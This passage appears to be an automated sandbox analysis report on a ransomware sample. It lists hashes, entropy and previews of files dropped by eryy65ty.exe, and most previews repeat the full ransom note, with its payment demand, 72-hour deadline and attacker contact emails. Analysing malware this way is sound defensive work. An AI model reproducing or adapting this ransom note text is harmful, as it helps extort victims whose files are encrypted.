                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1226
                                                                                                                                            Entropy (8bit):7.826185262120555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:BzQpdN6LFv3ZD6PR0NQ8lHHb5q5fR9gJEw2I6K0hzNeXO:B2IFv3ZD6aNQWHYf9gn2I4ZNe+
                                                                                                                                            MD5:D4A00ABC65DA99D612D0A582980717C7
                                                                                                                                            SHA1:934B077BAF468E07D2E3884D75928CF9525311DE
                                                                                                                                            SHA-256:D69E1B5976EB7C8C5037908C0B03B937C0B4727089752425D92314602B849B25
                                                                                                                                            SHA-512:4A1E14F81F30852A50EB5EA80FB4D417DA5E8E2BD7BB47461B9A560F5CE673F62115F09F7DAB9F764FDE5716942598283F9ADC0CB28B8D5A93B3B6684A36C04C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.5...x.<E.....{..}...;.W.n..28Q..b,B...>h....3(*.]w/L.....f................8;.....[k......^..V....U.. .4.y.V......Y.?R...{.p.}...q...`q...l@U...9s.e..Tu_..1<.......=.&R..}.t.....l.2...;...{C.A.$.n.w*2[..0\.........V=..".5...}l..q&J..l.2...\..$...,>../.S...E^..fm%..Z.V&.V3...](.K.I...N3.......`r.#..t..D.)R.."...\.a.{..+.+;h...\p..@.T5.@..n....y.k...R.6.J.:...V...p.r.D.....5..6.-.....B....?8%....X.`S}+v8.,.....Lr.e.b.^.6..K2....'.6O....S.....T..WC..@.zT...........}.......S........>n...V.....L.y..G8...O....v>4H.P.Z>..&]J)...b.......&)i(..X.0.y..h....MU.6........tD...|..?P....^....~N..q.].2..,...D..)d-.Z..(3...Cv.:..JsI....9..z...Z..\....0&.u...kN..^..{.....B.w..<...,.b.,.v...J.U.X.L.....,b.(/.w.W;......_..Z(c....Q..8.$.,uvMq...dT.L>_.....B....\.`.+../1...)O.U..['fR.t6.....Fte.'.'...}.I^RE$c.*.......9.......v?.l.?6.....(.......u.n7...;3.nX..O}\..}...N$@'.^i...O.)......<..4..M....>O..Gd.*.|...;.......='AL...F.wc.,.,....3K......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1226
                                                                                                                                            Entropy (8bit):7.826185262120555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:BzQpdN6LFv3ZD6PR0NQ8lHHb5q5fR9gJEw2I6K0hzNeXO:B2IFv3ZD6aNQWHYf9gn2I4ZNe+
                                                                                                                                            MD5:D4A00ABC65DA99D612D0A582980717C7
                                                                                                                                            SHA1:934B077BAF468E07D2E3884D75928CF9525311DE
                                                                                                                                            SHA-256:D69E1B5976EB7C8C5037908C0B03B937C0B4727089752425D92314602B849B25
                                                                                                                                            SHA-512:4A1E14F81F30852A50EB5EA80FB4D417DA5E8E2BD7BB47461B9A560F5CE673F62115F09F7DAB9F764FDE5716942598283F9ADC0CB28B8D5A93B3B6684A36C04C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.5...x.<E.....{..}...;.W.n..28Q..b,B...>h....3(*.]w/L.....f................8;.....[k......^..V....U.. .4.y.V......Y.?R...{.p.}...q...`q...l@U...9s.e..Tu_..1<.......=.&R..}.t.....l.2...;...{C.A.$.n.w*2[..0\.........V=..".5...}l..q&J..l.2...\..$...,>../.S...E^..fm%..Z.V&.V3...](.K.I...N3.......`r.#..t..D.)R.."...\.a.{..+.+;h...\p..@.T5.@..n....y.k...R.6.J.:...V...p.r.D.....5..6.-.....B....?8%....X.`S}+v8.,.....Lr.e.b.^.6..K2....'.6O....S.....T..WC..@.zT...........}.......S........>n...V.....L.y..G8...O....v>4H.P.Z>..&]J)...b.......&)i(..X.0.y..h....MU.6........tD...|..?P....^....~N..q.].2..,...D..)d-.Z..(3...Cv.:..JsI....9..z...Z..\....0&.u...kN..^..{.....B.w..<...,.b.,.v...J.U.X.L.....,b.(/.w.W;......_..Z(c....Q..8.$.,uvMq...dT.L>_.....B....\.`.+../1...)O.U..['fR.t6.....Fte.'.'...}.I^RE$c.*.......9.......v?.l.?6.....(.......u.n7...;3.nX..O}\..}...N$@'.^i...O.)......<..4..M....>O..Gd.*.|...;.......='AL...F.wc.,.,....3K......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
